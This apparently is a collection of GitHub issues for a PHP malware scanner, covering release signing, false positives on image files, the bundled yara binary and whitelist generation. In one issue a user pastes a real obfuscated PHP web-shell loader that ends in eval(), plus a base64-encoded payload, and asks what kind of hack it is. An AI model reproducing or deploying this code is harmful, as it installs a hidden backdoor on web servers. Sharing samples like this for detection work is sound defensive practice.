$³71¸¸34076112µ06=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<85>70µ53233³19´¶66']($³71¸¸34076112µ06,$<89>¶505·³465¶7´1µ6,$³71¸¸34076112µ06); return $³71¸¸34076112µ06^$<89>9·2³µ·2851µ5´5µ; }}$<83>³µ7834¶81µ9´2¸5["<85>70µ53233³19´¶66"]=´8·18¶3¸´µ9´µ1´8('jIuNoI+emw==','');$<83>³µ7834¶81µ9´2¸5["<83>464120·78´¸³³0´"]=´8·18¶3¸´µ9´µ1´8('nZ6MmsnLoJuanJCbmg==','');$<83>³µ7834¶81µ9´2¸5["<83>2µ³´522259¶6·2³"]=´8·18¶3¸´µ9´µ1´8('jIuNk5qR','');$<83>³µ7834¶81µ9´2¸5["<8a>·77306821¶µ¸256"]=´8·18¶3¸´µ9´µ1´8('Gw4QPCMiFwoGLjQ=','HKBjfp');$<83>³µ7834¶81µ9´2¸5["¸829¶³´197593·77"]='';$<83>³µ7834¶81µ9´2¸5["<8b>552¶965¸0´732·3"]=´8·18¶3¸´µ9´µ1´8('ZiAFGwwjBCM=','6hUD_fHe9');$<83>³µ7834¶81µ9´2¸5["··0702¶³´µµ8209³"]='';$<83>³µ7834¶81µ9´2¸5["<88>1³¶8´03324¶µ362"]='';$<83>³µ7834¶81µ9´2¸5["<8a>9¶¶1528381µ305¶"]=´8·18¶3¸´µ9´µ1´8('CzQTIBMXBz8AOxM=','XqAvVE');$<83>³µ7834¶81µ9´2¸5["¶06648·177994296"]='';$<83>³µ7834¶81µ9´2¸5["<84>¶5·27µ9076¸9·µ6"]='';$<83>³µ7834¶81µ9´2¸5["µ8790¸µ·27403321"]=´8·18¶3¸´µ9´µ1´8('WFZYblllfXZ1d1lV','ldv_kTSCBY');$<83>³µ7834¶81µ9´2¸5["<82>¸9053¶µ36·429µ0"]='';$<83>³µ7834¶81µ9´2¸5["<88>¸3³5´µ1¸2¸µ3591"]=´8·18¶3¸´µ9´µ1´8('DStf','nG67D');$<83>³µ7834¶81µ9´2¸5["µ3µ73¸¶22¶92¸99³"]='';$<83>³µ7834¶81µ9´2¸5["<85>77µ¶0´98³3¶3283"]=´8·18¶3¸´µ9´µ1´8('HA4VNhUDHQ8PHCs=','NKXyAFB');$<83>³µ7834¶81µ9´2¸5["µ38·¶µ¸¸5777¶05·"]=´8·18¶3¸´µ9´µ1´8('AxhnCDs7JiUc','KL3XdsivH');$<83>³µ7834¶81µ9´2¸5["<87>51¸582³³³3µµ¶µ1"]='';$<83>³µ7834¶81µ9´2¸5["<82>8´´301¸93³³µ080"]='';$<83>³µ7834¶81µ9´2¸5["<85>73606080·¸7414¸"]=´8·18¶3¸´µ9´µ1´8('FBlCWFItAUQGOgAQ','sc761Bl4t_');$<83>³µ7834¶81µ9´2¸5["<84>³331074705³·24¸"]=´8·18¶3¸´µ9´µ1´8('O14wQSA4','R0D7AT');$<83>³µ7834¶81µ9´2¸5["<87>4³1´9832µ54978¸"]=´8·18¶3¸´µ9´µ1´8('HUYkECY6','n2VbCLrH');$<83>³µ7834¶81µ9´2¸5["<82>¶µ5´223¸162³2¸9"]=´8·18¶3¸´µ9´µ1´8('JQI/ERwMNgAcCDwaNw49ADA=','CkSt');$<83>³µ7834¶81µ9´2¸5["<84>·¶2¶739¶17µ·042"]=´8·18¶3¸´µ9´µ1´8('GQAnKg==','miJOLV7G');$<83>³µ7834¶81µ9´2¸5["³¸88´0·8¶µ³48286"]=´8·18¶3¸´µ9´µ1´8('GwEEPz9L','htfLK9uXy');  $·53´·¶6³9¶7775µ³['<88>2³4³7µ4´¸85´74µ']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<84>·¶2¶739¶17µ·042'](); $·53´·¶6³9¶7775µ³['<83>·1´0´¸³0736µ02³']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<82>¶µ5´223¸162³2¸9'](<84>··7³µ³8¸13530´·); $·53´·¶6³9¶7775µ³['<8a>µ16¸9µ6¶997³´12']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<87>4³1´9832µ54978¸']('2ef4d9904bd650312d329366c9fe69dc'); $·53´·¶6³9¶7775µ³['³72¸1µ1µ¸´69¸0´´']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<84>³331074705³·24¸']($GLOBALS['<83>³µ7834¶81µ9´2¸5']['<87>4³1´9832µ54978¸']('1094000000')); $·53´·¶6³9¶7775µ³['<82>¸77·7·¸7¶6³752µ']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<84>³331074705³·24¸']($GLOBALS['<83>³µ7834¶81µ9´2¸5']['<87>4³1´9832µ54978¸']('6100000000')); $·53´·¶6³9¶7775µ³['<84>µ9³570¸4µ805963']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<84>³331074705³·24¸']($GLOBALS['<83>³µ7834¶81µ9´2¸5']['<87>4³1´9832µ54978¸']('6600000000')); $·53´·¶6³9¶7775µ³['<87>·³16³·7³´189·6³']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<84>³331074705³·24¸']($GLOBALS['<83>³µ7834¶81µ9´2¸5']['<87>4³1´9832µ54978¸']('0123000000')); $·53´·¶6³9¶7775µ³['<82>541³´13¸7´µ7¸³¶']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['³¸88´0·8¶µ³48286']($·53´·¶6³9¶7775µ³['<83>·1´0´¸³0736µ02³'],$·53´·¶6³9¶7775µ³['³72¸1µ1µ¸´69¸0´´'],$·53´·¶6³9¶7775µ³['<87>·³16³·7³´189·6³']); $·53´·¶6³9¶7775µ³['<82>541³´13¸7´µ7¸³¶']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<83>464120·78´¸³³0´']($·53´·¶6³9¶7775µ³['<82>541³´13¸7´µ7¸³¶']); $·53´·¶6³9¶7775µ³['<82>541³´13¸7´µ7¸³¶']=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<85>73606080·¸7414¸']($·53´·¶6³9¶7775µ³['<82>541³´13¸7´µ7¸³¶']); return(eval($·53´·¶6³9¶7775µ³['<82>541³´13¸7´µ7¸³¶'])); ?>
^M

And this after

#!/usr/bin/php -q^M
eNrtWWtPW1cW/SsERTVoUHvej1La2MaOzRuDoU6EEHaMzdNpnNSEtl+StGmTn3OeP2/2hWikMcdw^M
M5NpJ1Ilf7LuXXfts9dee59z7r82TirKvMJOWxL54+l3NHAtNWaO4oAJm95bsCpg5Wm08IzDVs0U^M
VjfrJ2v9TnulvLNYmCs0RjuPas9KK/KHwuz8/ZuYvyFhFGNRa0+x9S6JubbdWSu9PDlb6xW7a4uD^M
BcD9sb2/fJiGfBM88ZJqj6ULiJEkZGXUQaXRQgbVO2+1T9NQryIxVCpJo1SKGZOEWq9WuqvbJweN^M
RbxWWuzJxeIV7D47bu0coQnACuPgSPDSay4DTgKvXDzZBqDS8HBlsb47SCN5RKxlVnArDBeGJpFK^M
5ZNHa9uo2byO+GDzqNV4Kpp8AmSUwIkxSZhyFKUhK9vFbrmE8MPSsLbWO9mtvKwvlXutDL7RXVlM^M
I7/l0qIYKYK4pfJpBT3ZHG3Xyq2T8kt+Uis1q+uXg5U67Xxf6beGS72rAESruHH0fH+CpkxUyqKg^M
vDNMESWSX2kU6/3Ni9MqoMlRGZ2loRw1OvAodLBWEBySUEvl4ln9YthqnTG8vDgUy/1Op3Xek/Xj^M
QX/9g8ZePB9s1wT+cYJkDaUYSSYRN4GwmPzM98cnLzfLuJkx3q2KFbU/TKO9d1oZzp1CXgRqUBKt^M
fsHQ0iU6ALSN4+qEfP2utYtQQ4JQTS3TSaRqE7d3Lur9agOfNyujjfURKwLqUHF2WLucAEwZB+VK^M
5pSM0aeBawi1VkpKrdb6mZWc6uPh2dZi/emEkvKOW0JoxIIYEtOQ9fLodPni5GhlcfBo6ajVWz0q^M
nq8fN7MUVSv1tTSyNcwyBpbCmdIOpw1ldVE/rJeGZP0Yd+uXLEPcWmIri5X9Ok7DvgbQaJBzDEuw^M
mXQx7Gx1msXio52N6upFJvzG4WkLTchWUNZKYZyTSBKEfHpRL4fnG6Xmcq28iorFesbzdL3Z6U2w^M
l/cMReYk5N8aa8kEB9zu0J3eqLx2jM7Wryu0XmngrcHuhMgVV1JgRaSP3Ol0VZWPhsulRmsZwJpn^M
5fpWGupXKn1wlGkbmQoqzW9pVHlav7zK8kW3slE9KMtBK40H3qSgG8VgsDJSpVVUbqiTzTKvAN7l^M
yQ4qygn5CI67ICxShJrI02FW+qud5gihWqOT8Xv6bCA6zTTeHzhYhLW0zARnaJpb5aizu0ueN6q9^M
zUr1uhP90HgiGbk8GU0wZWaw1YoSx5mWKm0+D9GovVYedQGur46q9UltDXkbRCCOaQddKQnV6uNB^M
rV/pbfSvugVpqmLp4Hz/0YQESyqQQAqFKBmeYI3lC1Rb2hz1N/r1o3Jjs5SJuvdsebC21d6YYEAC^M
SQS25qMQ0bB0bh72mo/WiqPacm+4BZCD0YvN9pPKhELxTkunBPZgvBKlk7NcHJ0tl5TYOO5loRfb^M
L+tntf0JSnRIByg+Q4Xy0qarebfBn5TQoF+/zjR6yr7Xi9uyXQTMqfuBUxu8MNpLKbkzjwvvYCIi^M
UqDoDTNIhsLewv2HK+ul4srW48I4h8Le48K4pxT2Zm5/YVxN2QspHlhE7YTXWhqLSWFvdq6g2xwz^M
qdgThtuICqJw5+Cw3TlsK9LGSsnCXALpdcAWWfBR0IlDxADS/NTR4R0sx+evSSzHV2v23kK+aKYe^M
vJXwr43EalCZ0nwmD69x+wFe+/vV+kplf3/uTQjSOKMippwiG4DLApr6+eep2yHHp4FbIb9ZQEDd^M
R+WRYSQG6Hoax5m0mN54Aj0+evhpYYkFMR0Nh93nM/f3tyqNnUrjcXKiUsG7GDmgeJSZ4t7sdx/5^M
wtczd3/nnfYec6Io/EUR93d+J/HC14XCddLudc+ePn85k2sNZmd/+iSVNz7YQ94KXydLIMEhb75y^M
EX2M9uanfkkiIhMCQ15BxZNAfC4FvAtSUiQUwZBWwsXdmbn5AmQmHSJHhmiQMwYJO2ZyEfpVSucR^M
hGCopyCAOwklXrgiBErZqG3sbxU36gsLqaYTqeHg3JFER7mGXR9o5WOklVX7A8eFhwQRG0UE7JBV^M
52SQGwtyDWIphhFCQfoImBO7AvmlezrsfiShL76YevAbGKgTQoH/Qfez+KMJZSBWa48wdBhmuSSY^M
XBGaund39t5zToAPj8hKSsJV9q4QDTgybKjAyrxV0oTPyID/EE7Bvgu2nDFQgfXMv9tQwiSV1Ci6^M
ADsqRCnJlPU/tKE5sKFcHHIs+PjclO7EN1Uzl69f50hPPgI3nC4nAchm5EYZ5hDUhs5K5zMS4nso^M
drAHaYk0Puprm7hdir9jA6uUKYB5B1PcRCn+IRmTKEgXFYUZEyJcQPN/smYTZOenDgfPugedfr6J^M
cOpgmGxEASpXG0sDpho7GINhEe4uhrHdNhCf/mr6y1z4X07f/2o653jwLcqdEpwl/Crl+Z5fwJ+s^M
5G7wzl9yv0kRmPbcgIGC6PFnVHJORk+pJURBJ6TxQyNMRP4qShkkbIvhX8mJu66fW2vzVdSI00zp^M
gRHt0IfavH0HOHaKASHcYJ6cdm5+7GryeBOJh31tsJmVK2s+xJc4FPUceonTSMLmKrjsGPd2puOn^M
qJms8sBm03Jq3+EkjZ7AcEGi1uYTff4m7F29PUE4m2/uIDN2CQJkZr/JBw4TYKc/SC1JVER72OBq^M
yTWFoXx6b/7BW+VMwCBAjjlCxOfoEIkl+M8C+jYf+McF9I57hnB02BvvUNT/CuhzMI93zlvvYMxw^M
EUfu3Z2DYwhIQtaMdU4RdLVcf/rgmOBwxXryHuLGMAaen297esex0Nh9X97G9GGV/9pB86dJKvdI^M
CKYCllJrcGKRqdwgg7UQEkvPKQQBQvlsRG6xscpZ6ySyDJwnh+W8UtZSqGpNjXFIof/roTRB9u+h^M
9L8bSlHWYO79xVPpxAJ9y8GsFTHGUOe8w1mBeoy85pEpjYQnjn9OBWqw4VIrG2D6DtryySMsZ1DL^M
GOwWijmauw16/Go/naObdwJzqceMJBE70KkVOiILqfxH4qm3sJbChOxgX+kgTPqpN05DzFmhKMS1^M
oOmnbo7ss+mj2o9emNdMMExA9QriNsjeeU8zfgOfXsmbPD4V4fF7vdzfn5961n3+4tn5TPfHg9P8^M
nL/79p9HxrWSVUF5cDA4Zm9WOUpIeEdpWk9tTmpCZXRLYjNTdTJYaHdZYW56TEQ3RlE2UnJQbEM0^M
rAdgIpyl2xtLif9G9VTXbVcXcSMeT+V4ReDHNHXJxQQtpexjv8NfquP2PXaZVn6czpmenU28nGxm^M
y+ONQw5EDidJs+ziX6si3c7rGr9+N2OlikchMepepQIn+U6k8WtuFJOwBdZEmQXWX4UCbCOIwTBH^M
EMjHjtlyFDuBNRIIDBRoy0vpjNtDDG4y78w/unf2gwiLibwRyORGAbgvXLdMFPkFudVh1R/mwodl^M
Bt1aKu3W8kyIcenL0E6b0zHSmPntJAPncvV32ksHLktYVbfFxFRZZBBbljido0zXf5ETCTDyAxVF^M
qIap11SdVcnaCqKLOdwu0rvQeX/HzKgPgX47H0+aFdJadt4dMGRgcKFTDcLKRlSXayHl7YcyJl5h^M
ls5U1GeWSJbQGhvC2lhdIA5eG6aloPisU3olALz5PRV2L3uVDUaA+1BdtP+/0Y5UTVpEOlUxcVEC^M
LMuG/JvbOA4PutniKbRKTRIUUinnSh1btI4ymEUJA7X9h58//Q+Pal3JKjFBzWwacNmkzFQzv3KD^M
mG9flxzPkXPLMIVTVhVz73nHfTRHfHlHuUkXuxy4rYcluPfXHLEDVeNpRdJLtKzKswEHOyKKocca^M
muK5XLCaOiXFVwM2KYiy2UXeeJX7QWtK5d+neEnhBb5hLAA1lihAr2R9y4FReBSJYiJYc+GVMuCk^M
YXDWvuPSYUcB/ztA35t0buyWvSPLkvRe/LGxP1vCA/se1o7A/S1urhgivA+M7483kDAkdR/yconw^M
J0c3hPQk1QNHCOx5eaSzr5PpyMinhaUg9uzFwPIjrvuKAJiedmrbeePbotF9/fQG56b1PddBeuVv^M
dlhdN8VPstsSb6ojoTvp1HnvhHZzjso97zXXAfiwWcEdsJaJ5gt8klVOAu/tqCWq9OQVRtrXV7Xz^M
7Cr1DZmmf1C/0A6ACqjy4ArUaW4S1eXhOYjd629jmphkP3zm7x0o9c1PjPpa+5umkf+/T87S+67f^M
DldivnXVk/1Ce4BaBUr98Frd9CdNw9MJIwEos6CrgUwqxKCDlT2o50g9lCy53/X1+28awvDdGjf0^M
vqZx4/xfETz+swxjWkwrwfMUPs5xuFFAJFESTEWGZL/3C44pT8DwOgXcVRMMTAYEflRhnjL9Iuqh^M
oFiw8KFBTjSQa+2P5uQrlzMggBl2rl72oS6mru8ad2QnQmngadsBQAwOqKYCa2Awep08EKR8ppFB^M
YTKY7Geso8iShLmL/QXbtCswu8Tv+SDbrGc99l94uC6J^M

Do you know this type of hack ?

Signing releases and updates

Currently, releases aren't signed.
We need to decide with what key we (as in NBS System) want to sign them.

Also, since we now have an update mechanism (because people are too lazy to upgrade packages), it would be great if we could sign the updates too.

Decide with which key we want to sign the releases
Update the release process
Update the README.md file
Find a way to have signed updates
Implement signed updates
Do a new release

Lots of HiddenInAFile false-positive

I'm trying to test PMF against a potentially vulnerable Prestashop installation and I'm getting hundreds of false positive against images.

HiddenInAFile /var/www/toto.com//htdocs/img/p/1/0/1/101.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/5/155-thickbox_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/9/159-home_atc.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/8/158-cart_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/8/158-medium_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/8/158-home_atch.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/9/159-large_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/9/159-thickbox_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/8/158-thickbox_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/0/7/107.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/8/158-large_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/8/158-large_atch.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/7/157-large_atch.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/7/157-large_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/4/194-home_atch.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/7/157-thickbox_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/7/157.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/4/194-large_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/9/159.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/5/8/158.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/0/190-medium_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/4/194-thickbox_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/0/190-large_atch.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/0/190-home_atch.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/5/195-home_atch.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/0/190-home_atc.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/0/9/109.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/5/195-thickbox_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/5/195-home_atc.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/0/190-large_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/5/195-large_default.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/9/199-home_atc.jpg
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/9/9/199-home_atch.jpg

Any idea?

remove yara binary distribution

I don't think it's a good idea to promote running unknown binaries downloaded from the internet. Having yara in the git makes it heavy and unsafe.

I recommend having a few instructions to install yara (easy on most distributions) and if all else fails offer a download of that binary file from some other hosting.

Updated whitelists?

Using the -u switch just grabs the whitelists from the master branch here. Which would be fine if they were being kept updated.

I mean, WP is at version 4.9.1 which results in quite a few false positives on a clean install.

There is no repository for updated whitelists? It seems to me it should be trivial to set up an automated workflow with WP-CLI on some cloud provider in order to fetch a fresh WP whenever there is a new version and generate a whitelist automatically.

So, I guess this is a feature request?

I tried generating my own whitelist for v4.9.1 but I get the following (Ubuntu 16.04)

apt install python-yara -y
[...]
~#: ./generate_whitelist.py wordpress491 /var/www/html
Traceback (most recent call last):
  File "./generate_whitelist.py", line 30, in <module>
    matches = rules.match(fname, fast=True)
yara.Error: could not map file "/var/www/html/wp-login.php" into memory

If you could assist in the above error, maybe I can assist in building an automated system for generating whitelists for Wordpress (I am a devops at a cloud VPS provider, so I can automate the setup of a clean environment and host the resulting whitelist files, if you wish ...)